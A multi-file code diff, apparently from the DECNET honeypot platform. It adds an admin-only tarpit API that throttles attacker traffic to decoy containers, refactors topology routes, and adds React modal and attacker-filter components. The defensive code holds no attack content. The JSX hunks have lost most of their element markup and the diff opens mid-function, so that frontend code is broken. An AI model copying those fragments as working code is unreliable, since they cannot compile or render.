""" parts = topic.split(".", 2) - return parts[2] if len(parts) >= 3 else topic + if len(parts) < 3: + return topic + head, _ident, tail = parts + # Decky events: keep the ``decky.`` prefix so the frontend + # discriminates them from topology-lifecycle events that happen to + # share an event name (e.g. ``status``). + if head == _topics.DECKY: + return f"{_topics.DECKY}.{tail}" + return tail diff --git a/decnet/web/router/topology/api_lan_crud.py b/decnet/web/router/topology/api_lan_crud.py index ae15d394..9a4d9899 100644 --- a/decnet/web/router/topology/api_lan_crud.py +++ b/decnet/web/router/topology/api_lan_crud.py @@ -73,11 +73,11 @@ async def api_create_lan( raise map_repo_exception(exc) from exc rows = await repo.list_lans_for_topology(topology_id) - row = next((r for r in rows if r["id"] == lan_id), None) + row = next((r for r in rows if r.id == lan_id), None) if row is None: # pragma: no cover — would mean insert vanished raise HTTPException(status_code=500, detail="LAN insert vanished") - return LANRow(**row) + return row @router.patch( @@ -115,10 +115,10 @@ async def api_update_lan( raise HTTPException(status_code=404, detail=str(exc)) from exc rows = await repo.list_lans_for_topology(topology_id) - row = next((r for r in rows if r["id"] == lan_id), None) + row = next((r for r in rows if r.id == lan_id), None) if row is None: raise HTTPException(status_code=404, detail="LAN not found") - return LANRow(**row) + return row @router.delete( @@ -142,7 +142,7 @@ async def api_delete_lan( await assert_pending_or_409(topology_id) rows = await repo.list_lans_for_topology(topology_id) - if not any(r["id"] == lan_id for r in rows): + if not any(r.id == lan_id for r in rows): raise HTTPException(status_code=404, detail="LAN not found") try: diff --git a/decnet/web/router/topology/api_mutations.py b/decnet/web/router/topology/api_mutations.py index d0f4cf4b..299bfea3 100644 --- a/decnet/web/router/topology/api_mutations.py +++ 
b/decnet/web/router/topology/api_mutations.py @@ -63,11 +63,11 @@ async def api_enqueue_mutation( _admin: dict = Depends(require_admin), ) -> MutationEnqueueResponse: topo = await get_topology_or_404(topology_id) - if topo["status"] not in _MUTATABLE: + if topo.status not in _MUTATABLE: raise HTTPException( status_code=409, detail=( - f"Topology is {topo['status']!r}; the mutation queue is " + f"Topology is {topo.status!r}; the mutation queue is " f"only open for 'active' or 'degraded' topologies. Use " f"child-CRUD endpoints while pending." ), diff --git a/decnet/web/router/topology/api_personas.py b/decnet/web/router/topology/api_personas.py index e2f6ea13..b18eee30 100644 --- a/decnet/web/router/topology/api_personas.py +++ b/decnet/web/router/topology/api_personas.py @@ -54,13 +54,13 @@ async def list_topology_personas( topo = await repo.get_topology(topology_id) if topo is None: raise HTTPException(status_code=404, detail="Topology not found") - language_default = topo.get("language_default") or "en" + language_default = topo.language_default or "en" personas = parse_personas( - topo.get("email_personas"), language_default=language_default, + topo.email_personas, language_default=language_default, ) return { "topology_id": topology_id, - "topology_name": topo.get("name", ""), + "topology_name": topo.name, "language_default": language_default, "personas": _serialize(personas), } @@ -100,7 +100,7 @@ async def replace_topology_personas( topo = await repo.get_topology(topology_id) if topo is None: raise HTTPException(status_code=404, detail="Topology not found") - language_default = topo.get("language_default") or "en" + language_default = topo.language_default or "en" parsed = parse_personas(raw, language_default=language_default) if raw and not parsed: @@ -125,7 +125,7 @@ async def replace_topology_personas( ) return { "topology_id": topology_id, - "topology_name": topo.get("name", ""), + "topology_name": topo.name, "language_default": language_default, 
"personas": serialized, } diff --git a/decnet/web/router/topology/api_tarpit.py b/decnet/web/router/topology/api_tarpit.py new file mode 100644 index 00000000..a65c9935 --- /dev/null +++ b/decnet/web/router/topology/api_tarpit.py @@ -0,0 +1,201 @@ +"""POST/GET/DELETE /api/v1/topologies/{topology_id}/deckies/{decky_name}/tarpit + +Same tc netem logic as the fleet tarpit, but scoped to a MazeNET topology. +Container name is resolved via resolve_decky_container so the SSH-suffix / +decnet_t_ convention is handled transparently. + +Auth: require_admin for write operations, require_viewer for GET. +""" +from __future__ import annotations + +import asyncio +import json + +from fastapi import APIRouter, Depends, HTTPException, Path + +from decnet.decky_io.resolve import resolve_decky_container +from decnet.logging import get_logger +from decnet.network import get_container_pid, get_container_veth +from decnet.web.db.models import ( + MessageResponse, + TarpitEnableRequest, + TarpitRuleResponse, + TarpitStatusResponse, +) +from decnet.web.dependencies import repo, require_admin, require_viewer +from decnet.web.router.deckies.api_tarpit import ( + _apply_tarpit, + _get_active_connections, + _remove_tarpit, +) + +log = get_logger("api.topology.tarpit") + +_TOPO_RE = r"^[a-zA-Z0-9\-]{1,64}$" +_DECKY_RE = r"^[a-z0-9\-]{1,64}$" + +router = APIRouter( + prefix="/{topology_id}/deckies/{decky_name}/tarpit", + tags=["Topologies"], +) + + +def _db_key(topology_id: str, decky_name: str) -> str: + """Namespace topology tarpit rules away from fleet rules.""" + return f"t:{topology_id}:{decky_name}" + + +@router.post( + "", + response_model=MessageResponse, + status_code=201, + responses={ + 401: {"description": "Could not validate credentials"}, + 403: {"description": "Insufficient permissions"}, + 404: {"description": "Decky not found in topology"}, + 409: {"description": "tc command failed (qdisc already exists or container unreachable)"}, + }, +) +async def api_enable_tarpit( + 
topology_id: str = Path(..., pattern=_TOPO_RE), + decky_name: str = Path(..., pattern=_DECKY_RE), + req: TarpitEnableRequest = ..., # type: ignore[assignment] + admin: dict = Depends(require_admin), +) -> MessageResponse: + try: + container = await resolve_decky_container(repo, decky_name, topology_id=topology_id) + except LookupError as exc: + raise HTTPException(status_code=404, detail=str(exc)) from exc + + try: + veth = await asyncio.to_thread(get_container_veth, container) + except LookupError as exc: + raise HTTPException(status_code=404, detail=str(exc)) from exc + + try: + await asyncio.to_thread(_apply_tarpit, veth, req.ports, req.delay_ms) + except RuntimeError as exc: + raise HTTPException(status_code=409, detail=str(exc)) from exc + + db_key = _db_key(topology_id, decky_name) + ports_json = json.dumps(req.ports) + await repo.set_tarpit_rule({ + "decky_name": db_key, + "ports": ports_json, + "delay_ms": req.delay_ms, + "created_by": admin.get("uuid", "unknown"), + }) + await repo.add_log({ + "decky": decky_name, + "service": "tarpit", + "event_type": "tarpit_enabled", + "attacker_ip": "0.0.0.0", # nosec B104 + "raw_line": ( + f"tarpit enabled topology={topology_id} decky={decky_name}" + f" ports={req.ports} delay={req.delay_ms}ms" + f" by={admin.get('uuid', 'unknown')}" + ), + "fields": json.dumps({ + "topology_id": topology_id, + "ports": req.ports, + "delay_ms": req.delay_ms, + "veth": veth, + "container": container, + "operator": admin.get("uuid"), + }), + }) + log.info( + "tarpit enabled topology=%s decky=%s ports=%s delay_ms=%d veth=%s by=%s", + topology_id, decky_name, req.ports, req.delay_ms, veth, admin.get("uuid"), + ) + return MessageResponse(message="tarpit active") + + +@router.get( + "", + response_model=TarpitStatusResponse, + responses={ + 401: {"description": "Could not validate credentials"}, + 403: {"description": "Insufficient permissions"}, + 404: {"description": "No active tarpit rule for this decky"}, + }, +) +async def 
api_get_tarpit( + topology_id: str = Path(..., pattern=_TOPO_RE), + decky_name: str = Path(..., pattern=_DECKY_RE), + viewer: dict = Depends(require_viewer), +) -> TarpitStatusResponse: + db_key = _db_key(topology_id, decky_name) + rule = await repo.get_tarpit_rule(db_key) + if rule is None: + raise HTTPException(status_code=404, detail="No active tarpit rule for this decky") + + conns: list[dict] = [] + try: + container = await resolve_decky_container(repo, decky_name, topology_id=topology_id) + pid = await asyncio.to_thread(get_container_pid, container) + raw_conns = await asyncio.to_thread(_get_active_connections, pid, rule["ports"]) + for c in raw_conns: + conns.append({"ip": c["ip"], "port": c["port"]}) + except LookupError: + pass + + return TarpitStatusResponse( + rule=TarpitRuleResponse(**{**rule, "decky_name": decky_name}), + active_connections=conns, + ) + + +@router.delete( + "", + response_model=MessageResponse, + responses={ + 401: {"description": "Could not validate credentials"}, + 403: {"description": "Insufficient permissions"}, + 404: {"description": "Decky container not found"}, + 409: {"description": "tc teardown failed"}, + }, +) +async def api_disable_tarpit( + topology_id: str = Path(..., pattern=_TOPO_RE), + decky_name: str = Path(..., pattern=_DECKY_RE), + admin: dict = Depends(require_admin), +) -> MessageResponse: + try: + container = await resolve_decky_container(repo, decky_name, topology_id=topology_id) + except LookupError as exc: + raise HTTPException(status_code=404, detail=str(exc)) from exc + + try: + veth = await asyncio.to_thread(get_container_veth, container) + except LookupError as exc: + raise HTTPException(status_code=404, detail=str(exc)) from exc + + try: + await asyncio.to_thread(_remove_tarpit, veth) + except RuntimeError as exc: + raise HTTPException(status_code=409, detail=str(exc)) from exc + + db_key = _db_key(topology_id, decky_name) + await repo.delete_tarpit_rule(db_key) + await repo.add_log({ + "decky": 
decky_name, + "service": "tarpit", + "event_type": "tarpit_disabled", + "attacker_ip": "0.0.0.0", # nosec B104 + "raw_line": ( + f"tarpit disabled topology={topology_id} decky={decky_name}" + f" by={admin.get('uuid', 'unknown')}" + ), + "fields": json.dumps({ + "topology_id": topology_id, + "veth": veth, + "container": container, + "operator": admin.get("uuid"), + }), + }) + log.info( + "tarpit disabled topology=%s decky=%s veth=%s by=%s", + topology_id, decky_name, veth, admin.get("uuid"), + ) + return MessageResponse(message="tarpit removed") diff --git a/decnet/web/router/topology/api_teardown_topology.py b/decnet/web/router/topology/api_teardown_topology.py index db7e461f..44e4d626 100644 --- a/decnet/web/router/topology/api_teardown_topology.py +++ b/decnet/web/router/topology/api_teardown_topology.py @@ -66,11 +66,11 @@ async def api_teardown_topology( topo = await repo.get_topology(topology_id) if topo is None: raise HTTPException(status_code=404, detail="Topology not found") - if topo["status"] not in _TEARDOWNABLE: + if topo.status not in _TEARDOWNABLE: raise HTTPException( status_code=409, detail=( - f"Topology is {topo['status']!r}; cannot teardown " + f"Topology is {topo.status!r}; cannot teardown " f"(allowed from: {sorted(_TEARDOWNABLE)})." ), ) diff --git a/decnet_web/src/components/AddServiceConfigModal.tsx b/decnet_web/src/components/AddServiceConfigModal.tsx new file mode 100644 index 00000000..b4bcfaf1 --- /dev/null +++ b/decnet_web/src/components/AddServiceConfigModal.tsx @@ -0,0 +1,120 @@ +import React, { useEffect, useState } from 'react'; +import api from '../utils/api'; +import Modal from './Modal/Modal'; +import ServiceConfigFields, { + type FormState as SvcFormState, + type ServiceConfigFieldDTO as SvcFieldDTO, + type SchemaResponse, + buildInitial as svcBuildInitial, + compactPayload as svcCompactPayload, + fmtSchemaError, +} from './ServiceConfigFields'; + +interface Props { + /** When non-null, modal is open for this {decky, slug}. 
*/ + pending: { deckyName: string; slug: string } | null; + /** Operator dismissed the modal without adding. */ + onCancel: () => void; + /** User confirmed (or schema is empty — auto-confirm path). */ + onConfirm: (deckyName: string, slug: string, config: Record) => Promise; +} + +const AddServiceConfigModal: React.FC = ({ pending, onCancel, onConfirm }) => { + const [schema, setSchema] = useState(null); + const [state, setState] = useState({}); + const [busy, setBusy] = useState(false); + const [err, setErr] = useState(null); + + const slug = pending?.slug ?? null; + const deckyName = pending?.deckyName ?? null; + + // Reset on slug change so leftover state from a previous open doesn't + // bleed through into a different service's form. + useEffect(() => { + setSchema(null); + setState({}); + setBusy(false); + setErr(null); + if (!slug || !deckyName) return; + let cancelled = false; + api.get(`/topologies/services/${encodeURIComponent(slug)}/schema`) + .then(({ data }) => { + if (cancelled) return; + setSchema(data); + // Empty schema → no operator decision to make; fire immediately + // and close. The caller's onConfirm handles the POST. + if (data.fields.length === 0) { + onConfirm(deckyName, slug, {}).catch(() => { /* caller surfaces */ }); + return; + } + setState(svcBuildInitial(data.fields, {})); + }) + .catch((loadErr) => { + if (cancelled) return; + setErr(fmtSchemaError(loadErr, 'Schema load failed.')); + }); + return () => { cancelled = true; }; + }, [slug, deckyName, onConfirm]); + + // Don't render anything while we're auto-confirming an empty-schema add — + // saves the brief flash of an empty modal. + if (!pending) return null; + if (schema && schema.fields.length === 0) return null; + + const fields: SvcFieldDTO[] = schema?.fields ?? 
[]; + + const submit = async () => { + if (!schema || !slug || !deckyName) return; + setBusy(true); + setErr(null); + try { + const compact = svcCompactPayload(fields, state); + await onConfirm(deckyName, slug, compact); + } catch (e) { + const msg = (e as { response?: { data?: { detail?: string } } })?.response?.data?.detail + ?? 'Add failed.'; + setErr(msg); + } finally { + setBusy(false); + } + }; + + return ( + { /* ignore close-during-busy */ } : onCancel} + title={slug ? `ADD ${slug.toUpperCase()}` : 'ADD SERVICE'} + accent="violet" + footer={ + <> + + + + } + > +
+ {!schema && !err &&
Loading schema…
} + {err &&
{err}
} + {schema && slug && fields.length > 0 && ( + + )} +
+
+ ); +}; + +export default AddServiceConfigModal; diff --git a/decnet_web/src/components/AttackerDetail.tsx b/decnet_web/src/components/AttackerDetail.tsx index 124bbf57..88257903 100644 --- a/decnet_web/src/components/AttackerDetail.tsx +++ b/decnet_web/src/components/AttackerDetail.tsx @@ -1479,7 +1479,7 @@ const AttackerDetail: React.FC = () => { } return ( -
+
{/* Back Button */} + {(['active', 'passive', 'inactive'] as ActivityTier[]).map(tier => ( + + ))} +
+ {countries.length > 0 && ( +
+ {countries.map(cc => ( + + ))} +
+ )} +
+
@@ -160,6 +228,16 @@ const Attackers: React.FC = () => { )}
+
Page {page} of {totalPages}